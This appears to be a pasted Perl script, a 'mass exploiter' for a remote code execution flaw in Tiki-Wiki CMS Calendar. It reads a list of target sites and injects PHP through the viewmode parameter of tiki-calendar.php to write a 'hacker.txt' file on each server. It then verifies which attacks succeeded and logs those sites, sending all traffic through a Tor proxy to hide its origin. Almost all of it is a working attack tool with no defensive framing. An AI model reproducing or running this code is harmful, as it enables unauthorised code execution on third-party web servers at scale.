SHOW:
|
|
- or go back to the newest paste.
| 1 | #!/usr/bin/perl | |
| 2 | # ->Coder By CrashBandicot | |
| 3 | # | |
| 4 | # Tiki-Wiki CMS Calendar 14.2, 12.5 LTS, 9.11 LTS, and 6.15 - Remote Code Execution | |
| 5 | # discovery by Dany Ouellet | |
| 6 | # ref: https://www.exploit-db.com/exploits/39965/ | |
| 7 | ||
| 8 | use LWP::UserAgent; | |
| 9 | use LWP::Protocol::socks; | |
| 10 | use HTTP::Request::Common; | |
| 11 | ||
| 12 | if ($^O =~ /Win/) { system("cls"); } else { system("clear"); }
| |
| 13 | print " | |
| 14 | ||
| 15 | Tiki Mass Explo!ter RCE | |
| 16 | by CrashBandicot | |
| 17 | ||
| 18 | Usage : $0 list.txt | |
| 19 | ||
| 20 | \n"; | |
| 21 | ||
| 22 | ||
| 23 | open(tarrget,"<$ARGV[0]") or die "$!"; | |
| 24 | while(<tarrget>){
| |
| 25 | chomp($_); | |
| 26 | $webs = $_; | |
| 27 | ||
| 28 | print " [+] Scanning -> $webs"; | |
| 29 | ||
| 30 | $payload = '/tiki-calendar.php?viewmode=%27;%20$z=fopen(%22hacker.txt%22,%27w%27);%20fwrite($z,(%22by%20hacker%22));fclose($z);$a=%27'; | |
| 31 | ||
| 32 | $ua = LWP::UserAgent->new(); | |
| 33 | $ua->proxy([qw/ http https /] => 'socks://127.0.0.1:9150'); | |
| 34 | $ua->timeout(30); | |
| 35 | $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
| |
| 36 | $fuck = $ua->get($webs.$payload); | |
| 37 | ||
| 38 | $def = $webs."/hacker.txt"; | |
| 39 | ||
| 40 | $check = $ua->get($def)->content; | |
| 41 | if($check =~/hacker/) {
| |
| 42 | ||
| 43 | print "\n\n [+] File Uploaded >> $def\n"; | |
| 44 | ||
| 45 | open(save ,">>savetiki.txt"); | |
| 46 | print save "$def\n"; | |
| 47 | close save; | |
| 48 | ||
| 49 | ||
| 50 | } else { print "\n [-] File Upload Fail\n"; }
| |
| 51 | ||
| 52 | ||
| 53 | } |
